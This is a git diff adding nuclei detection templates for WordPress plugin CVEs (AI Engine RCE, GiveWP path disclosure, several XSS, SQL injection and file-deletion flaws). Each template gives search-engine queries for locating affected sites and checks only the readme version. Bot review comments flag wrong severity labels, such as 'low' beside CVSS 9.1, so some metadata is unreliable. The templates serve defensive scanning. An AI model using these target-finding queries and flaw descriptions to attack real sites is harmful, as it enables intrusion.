diff --git a/poc/cve/CVE-2024-6451-07f7ccbed8a5e6918f12a0374cac643f.yaml b/poc/cve/CVE-2024-6451-07f7ccbed8a5e6918f12a0374cac643f.yaml
new file mode 100644
index 0000000000..8ea5d1b1b9
--- /dev/null
+++ b/poc/cve/CVE-2024-6451-07f7ccbed8a5e6918f12a0374cac643f.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-6451-07f7ccbed8a5e6918f12a0374cac643f
+
+info:
+ name: >
+ AI Engine <= 2.5.0 - Authenticated (Admin+) Remote Code Execution
+ author: topscoder
+ severity: low
+ description: >
+ The AI Engine plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 2.5.0 via the /wp-json/mwai/v1/settings/update REST API endpoint. This is due to the plugin not properly validating a log path file extension allowing a user to set the log extension as .php making the file executable. This makes it possible for authenticated attackers, with administrator-level access and above, to execute code on the server.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/d9f6b761-9c4b-4dcc-885d-9a5b4e8e534d?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.2
+ cve-id: CVE-2024-6451
+ metadata:
+ fofa-query: "wp-content/plugins/ai-engine/"
+ google-query: inurl:"/wp-content/plugins/ai-engine/"
+ shodan-query: 'vuln:CVE-2024-6451'
+ tags: cve,wordpress,wp-plugin,ai-engine,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ai-engine/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ai-engine"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.5.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-6551-71cd34e5a5ee9991ff68a34f6b666def.yaml b/poc/cve/CVE-2024-6551-71cd34e5a5ee9991ff68a34f6b666def.yaml
new file mode 100644
index 0000000000..9338ad547f
--- /dev/null
+++ b/poc/cve/CVE-2024-6551-71cd34e5a5ee9991ff68a34f6b666def.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-6551-71cd34e5a5ee9991ff68a34f6b666def
+
+info:
+ name: >
+ GiveWP <= 3.15.1 - Unauthenticated Full Path Disclosure
+ author: topscoder
+ severity: medium
+ description: >
+ The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 3.15.1. This is due to the plugin utilizing Symfony and leaving display_errors on within test files. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/2a13ce09-b312-4186-b0e2-63065c47f15d?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-6551
+ metadata:
+ fofa-query: "wp-content/plugins/give/"
+ google-query: inurl:"/wp-content/plugins/give/"
+ shodan-query: 'vuln:CVE-2024-6551'
+ tags: cve,wordpress,wp-plugin,give,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/give/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "give"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.15.1')
\ No newline at end of file
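Review bot: The identity matcher `- "give"` is an ordinary English word, so any 200 response that happens to contain it satisfies the word check; the only thing tying a hit to GiveWP is the request path, and a site that answers unknown paths with a 200 page (the request follows up to three redirects) is rejected only because `compare_versions` finds no `Stable tag`. A plugin-specific string from the readme header, e.g. `- "<GiveWP readme title line — placeholder>"`, would let the word matcher actually discriminate. Separately, `cvss-metrics` scores this Full Path Disclosure as `C:N/I:L/A:N` while CVE-2024-6448 in the same patch scores the same issue class as `C:L/I:N/A:N`; one of the two looks transposed and should be checked against the Wordfence entry.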
diff --git a/poc/cve/CVE-2024-6715-ae0f82685b3de95ecd0d10ca1e832b49.yaml b/poc/cve/CVE-2024-6715-ae0f82685b3de95ecd0d10ca1e832b49.yaml
new file mode 100644
index 0000000000..0251751884
--- /dev/null
+++ b/poc/cve/CVE-2024-6715-ae0f82685b3de95ecd0d10ca1e832b49.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-6715-ae0f82685b3de95ecd0d10ca1e832b49
+
+info:
+ name: >
+ Ditty 3.1.39 - 3.1.45 - Authenticated (Author+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Ditty – Responsive News Tickers, Sliders, and Lists plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Content Title' field in versions 3.1.39 to 3.1.45 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This was previously patched as CVE-2024-3939 and was recently reintroduced.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/80f32108-16a5-478f-9966-7153735cad6d?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-6715
+ metadata:
+ fofa-query: "wp-content/plugins/ditty-news-ticker/"
+ google-query: inurl:"/wp-content/plugins/ditty-news-ticker/"
+ shodan-query: 'vuln:CVE-2024-6715'
+ tags: cve,wordpress,wp-plugin,ditty-news-ticker,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ditty-news-ticker/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ditty-news-ticker"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '>= 3.1.39', '<= 3.1.45')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-6879-408050f5fa9936779918006e4415cd11.yaml b/poc/cve/CVE-2024-6879-408050f5fa9936779918006e4415cd11.yaml
new file mode 100644
index 0000000000..42125299f6
--- /dev/null
+++ b/poc/cve/CVE-2024-6879-408050f5fa9936779918006e4415cd11.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-6879-408050f5fa9936779918006e4415cd11
+
+info:
+ name: >
+ Quiz and Survey Master (QSM) <= 9.1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the redirect URL in all versions up to, and including, 9.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/9a87f0a2-42b0-4536-b4d1-83a9f6ed4262?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-6879
+ metadata:
+ fofa-query: "wp-content/plugins/quiz-master-next/"
+ google-query: inurl:"/wp-content/plugins/quiz-master-next/"
+ shodan-query: 'vuln:CVE-2024-6879'
+ tags: cve,wordpress,wp-plugin,quiz-master-next,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/quiz-master-next/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "quiz-master-next"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 9.1.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-7030-1f332171cf5ea8b289acd21b158dc3ee.yaml b/poc/cve/CVE-2024-7030-1f332171cf5ea8b289acd21b158dc3ee.yaml
new file mode 100644
index 0000000000..6b0d972e1f
--- /dev/null
+++ b/poc/cve/CVE-2024-7030-1f332171cf5ea8b289acd21b158dc3ee.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-7030-1f332171cf5ea8b289acd21b158dc3ee
+
+info:
+ name: >
+ Smart Online Order for Clover <= 1.5.6 - Missing Authorization to Authenticated (Subscriber+) Plugin Data Update
+ author: topscoder
+ severity: low
+ description: >
+ The Smart Online Order for Clover plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several functions in all versions up to, and including, 1.5.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update product and category descriptions, category titles and images, and sort order.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/8664fec3-4e11-4775-a5ca-b4f58931da76?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-7030
+ metadata:
+ fofa-query: "wp-content/plugins/clover-online-orders/"
+ google-query: inurl:"/wp-content/plugins/clover-online-orders/"
+ shodan-query: 'vuln:CVE-2024-7030'
+ tags: cve,wordpress,wp-plugin,clover-online-orders,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/clover-online-orders/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "clover-online-orders"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.5.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-7032-cabe7edb9453e46b358c075428df2586.yaml b/poc/cve/CVE-2024-7032-cabe7edb9453e46b358c075428df2586.yaml
new file mode 100644
index 0000000000..edcefcecb4
--- /dev/null
+++ b/poc/cve/CVE-2024-7032-cabe7edb9453e46b358c075428df2586.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-7032-cabe7edb9453e46b358c075428df2586
+
+info:
+ name: >
+ Smart Online Order for Clover <= 1.5.6 - Missing Authorization to Plugin Deactivation and Data Deletion
+ author: topscoder
+ severity: high
+ description: >
+ The Smart Online Order for Clover plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'moo_deactivateAndClean' function in all versions up to, and including, 1.5.6. This makes it possible for unauthenticated attackers to deactivate the plugin and drop all plugin tables from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/9a6b05b1-c649-4b72-b884-11fb83ec77f2?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
+ cvss-score: 6.5
+ cve-id: CVE-2024-7032
+ metadata:
+ fofa-query: "wp-content/plugins/clover-online-orders/"
+ google-query: inurl:"/wp-content/plugins/clover-online-orders/"
+ shodan-query: 'vuln:CVE-2024-7032'
+ tags: cve,wordpress,wp-plugin,clover-online-orders,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/clover-online-orders/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "clover-online-orders"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.5.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-7313-b762e54f8085d18804da0898542a5ec1.yaml b/poc/cve/CVE-2024-7313-b762e54f8085d18804da0898542a5ec1.yaml
new file mode 100644
index 0000000000..ed85745b6f
--- /dev/null
+++ b/poc/cve/CVE-2024-7313-b762e54f8085d18804da0898542a5ec1.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-7313-b762e54f8085d18804da0898542a5ec1
+
+info:
+ name: >
+ Shield Security – Smart Bot Blocking & Intrusion Prevention Security <= 20.0.5 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Shield Security – Smart Bot Blocking & Intrusion Prevention Security plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'nav_sub' parameter in all versions up to, and including, 20.0.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f23e7274-45f6-46da-b4c8-2eaa1bd39257?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-7313
+ metadata:
+ fofa-query: "wp-content/plugins/wp-simple-firewall/"
+ google-query: inurl:"/wp-content/plugins/wp-simple-firewall/"
+ shodan-query: 'vuln:CVE-2024-7313'
+ tags: cve,wordpress,wp-plugin,wp-simple-firewall,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-simple-firewall/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-simple-firewall"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 20.0.5')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-7418-c9bdaa080236ee0e574742a6ecd2aa08.yaml b/poc/cve/CVE-2024-7418-c9bdaa080236ee0e574742a6ecd2aa08.yaml
new file mode 100644
index 0000000000..3d806c163f
--- /dev/null
+++ b/poc/cve/CVE-2024-7418-c9bdaa080236ee0e574742a6ecd2aa08.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-7418-c9bdaa080236ee0e574742a6ecd2aa08
+
+info:
+ name: >
+ The Post Grid <= 7.7.11 - Authenticated (Contributor+) Information Disclosure
+ author: topscoder
+ severity: low
+ description: >
+ The The Post Grid – Shortcode, Gutenberg Blocks and Elementor Addon for Post Grid plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.7.11 via the post_query_guten and post_query functions. This makes it possible for authenticated attackers, with contributor-level access and above, to extract information from posts that are not public (i.e. draft, future, etc..).
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/dddecb2e-9ad6-4e44-afce-5eba7da6322d?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-7418
+ metadata:
+ fofa-query: "wp-content/plugins/the-post-grid/"
+ google-query: inurl:"/wp-content/plugins/the-post-grid/"
+ shodan-query: 'vuln:CVE-2024-7418'
+ tags: cve,wordpress,wp-plugin,the-post-grid,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/the-post-grid/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "the-post-grid"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 7.7.11')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-7447.yaml b/poc/cve/CVE-2024-7447.yaml
new file mode 100644
index 0000000000..c884287fb6
--- /dev/null
+++ b/poc/cve/CVE-2024-7447.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-7447
+
+info:
+ name: >
+ Interactive Contact Form and Multi Step Form Builder with Drag & Drop Editor – Funnelforms Free <= 3.7.3.2 - Missing Authorization to Unauthenticated Arbitrary Media Upload
+ author: topscoder
+ severity: high
+ description: >
+ The Interactive Contact Form and Multi Step Form Builder with Drag & Drop Editor – Funnelforms Free plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'fnsf_af2_handel_file_upload' function in all versions up to, and including, 3.7.3.2. This makes it possible for unauthenticated attackers to upload arbitrary media to the site, even if no forms exist.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/9871f683-136e-45b5-90fb-a373a771014b?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-7447
+ metadata:
+ fofa-query: "wp-content/plugins/funnelforms-free/"
+ google-query: inurl:"/wp-content/plugins/funnelforms-free/"
+ shodan-query: 'vuln:CVE-2024-7447'
+ tags: cve,wordpress,wp-plugin,funnelforms-free,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/funnelforms-free/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "funnelforms-free"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.7.3.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-7573.yaml b/poc/cve/CVE-2024-7573.yaml
new file mode 100644
index 0000000000..b3516395a6
--- /dev/null
+++ b/poc/cve/CVE-2024-7573.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-7573
+
+info:
+ name: >
+ Relevanssi Live Ajax Search <= 2.4 - Unauthenticated WP_Query Argument Injection
+ author: topscoder
+ severity: medium
+ description: >
+ The Relevanssi Live Ajax Search plugin for WordPress is vulnerable to argument injection in all versions up to, and including, 2.4. This is due to insufficient validation of input supplied via POST data in the 'search' function. This makes it possible for unauthenticated attackers to inject arbitrary arguments into a WP_Query query and potentially expose sensitive information such as attachments or private posts.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/bbcb648a-4a3e-4645-bd62-4415b1cf6516?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-7573
+ metadata:
+ fofa-query: "wp-content/plugins/relevanssi-live-ajax-search/"
+ google-query: inurl:"/wp-content/plugins/relevanssi-live-ajax-search/"
+ shodan-query: 'vuln:CVE-2024-7573'
+ tags: cve,wordpress,wp-plugin,relevanssi-live-ajax-search,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/relevanssi-live-ajax-search/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "relevanssi-live-ajax-search"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-7606-06ad2ab98249fa61f169a794d53b3d8d.yaml b/poc/cve/CVE-2024-7606-06ad2ab98249fa61f169a794d53b3d8d.yaml
new file mode 100644
index 0000000000..4ed7b3b90c
--- /dev/null
+++ b/poc/cve/CVE-2024-7606-06ad2ab98249fa61f169a794d53b3d8d.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-7606-06ad2ab98249fa61f169a794d53b3d8d
+
+info:
+ name: >
+ Front End Users <= 3.2.28 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
+ author: topscoder
+ severity: low
+ description: >
+ The Front End Users plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'user-search' shortcode in all versions up to, and including, 3.2.28 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/048ea84c-0d53-434b-ae49-d804ec1de8c4?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-7606
+ metadata:
+ fofa-query: "wp-content/plugins/front-end-only-users/"
+ google-query: inurl:"/wp-content/plugins/front-end-only-users/"
+ shodan-query: 'vuln:CVE-2024-7606'
+ tags: cve,wordpress,wp-plugin,front-end-only-users,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/front-end-only-users/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "front-end-only-users"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.2.28')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-7607-4e7f3690990262b436b42cdf215f4676.yaml b/poc/cve/CVE-2024-7607-4e7f3690990262b436b42cdf215f4676.yaml
new file mode 100644
index 0000000000..697dfd63c1
--- /dev/null
+++ b/poc/cve/CVE-2024-7607-4e7f3690990262b436b42cdf215f4676.yaml
@@ -0,0 +1,59 @@ +id: CVE-2024-7607-4e7f3690990262b436b42cdf215f4676 + +info: + name: > + Front End Users <= 3.2.28 - Authenticated (Contributor+) Time-Based SQL Injection + author: topscoder + severity: low + description: > + The Front End Users plugin for WordPress is vulnerable to time-based SQL Injection via the ‘order’ parameter in all versions up to, and including, 3.2.28 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ec162cdc-d4cd-47d9-b941-24bfee6c48fd?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-7607 + metadata: + fofa-query: "wp-content/plugins/front-end-only-users/" + google-query: inurl:"/wp-content/plugins/front-end-only-users/" + shodan-query: 'vuln:CVE-2024-7607' + tags: cve,wordpress,wp-plugin,front-end-only-users,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/front-end-only-users/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "front-end-only-users" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.2.28') \ No newline at end of file 
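Review bot: `severity: low` (and the `low` tag) is inconsistent with `cvss-score: 8.8` and the C:H/I:H/A:H vector in the same block, which is a high-severity SQL injection; set `severity: high` and `tags: cve,wordpress,wp-plugin,front-end-only-users,high`. Because the template never sends the `order` parameter, nothing here is time-based or injection-specific — the match is purely "readme reports `Stable tag` <= 3.2.28", which the description should say so a triager does not treat the result as a confirmed SQLi.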
diff --git a/poc/cve/CVE-2024-7856-d011db87e0fcbee1bbbd734bfc806dcf.yaml b/poc/cve/CVE-2024-7856-d011db87e0fcbee1bbbd734bfc806dcf.yaml new file mode 100644 index 0000000000..1d4ab91acf --- /dev/null +++ b/poc/cve/CVE-2024-7856-d011db87e0fcbee1bbbd734bfc806dcf.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-7856-d011db87e0fcbee1bbbd734bfc806dcf + +info: + name: > + MP3 Audio Player – Music Player, Podcast Player & Radio by Sonaar <= 5.7.0.1 - Missing Authorization to Authenticated (Subscriber+) Arbitrary File Deletion + author: topscoder + severity: low + description: > + The MP3 Audio Player – Music Player, Podcast Player & Radio by Sonaar plugin for WordPress is vulnerable to unauthorized arbitrary file deletion due to a missing capability check on the removeTempFiles() function and insufficient path validation on the 'file' parameter in all versions up to, and including, 5.7.0.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary files which can make remote code execution possible when wp-config.php is deleted. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/43adc9dd-1780-440f-90c2-ff05a22eb084?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H + cvss-score: 9.1 + cve-id: CVE-2024-7856 + metadata: + fofa-query: "wp-content/plugins/mp3-music-player-by-sonaar/" + google-query: inurl:"/wp-content/plugins/mp3-music-player-by-sonaar/" + shodan-query: 'vuln:CVE-2024-7856' + tags: cve,wordpress,wp-plugin,mp3-music-player-by-sonaar,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mp3-music-player-by-sonaar/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mp3-music-player-by-sonaar" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.7.0.1') \ No newline at end of file 
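Review bot: `severity: low` contradicts `cvss-score: 9.1` two lines above it; for an arbitrary file deletion that the description says can reach RCE via `wp-config.php`, this should be `severity: critical` with a matching `critical` tag. The vector `PR:N` also disagrees with the name's "Authenticated (Subscriber+)" — with `PR:L` the same vector scores 8.1, so one of the two is wrong and should be checked against the Wordfence entry before this metadata is relied on. The detection itself is only a readme version check and does not touch `removeTempFiles()` or the `file` parameter.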
diff --git a/poc/cve/CVE-2024-7857-a18aa7c9dff5c4191bbf30ebf29a07a1.yaml b/poc/cve/CVE-2024-7857-a18aa7c9dff5c4191bbf30ebf29a07a1.yaml new file mode 100644 index 0000000000..0d0661d5c9 --- /dev/null +++ b/poc/cve/CVE-2024-7857-a18aa7c9dff5c4191bbf30ebf29a07a1.yaml 
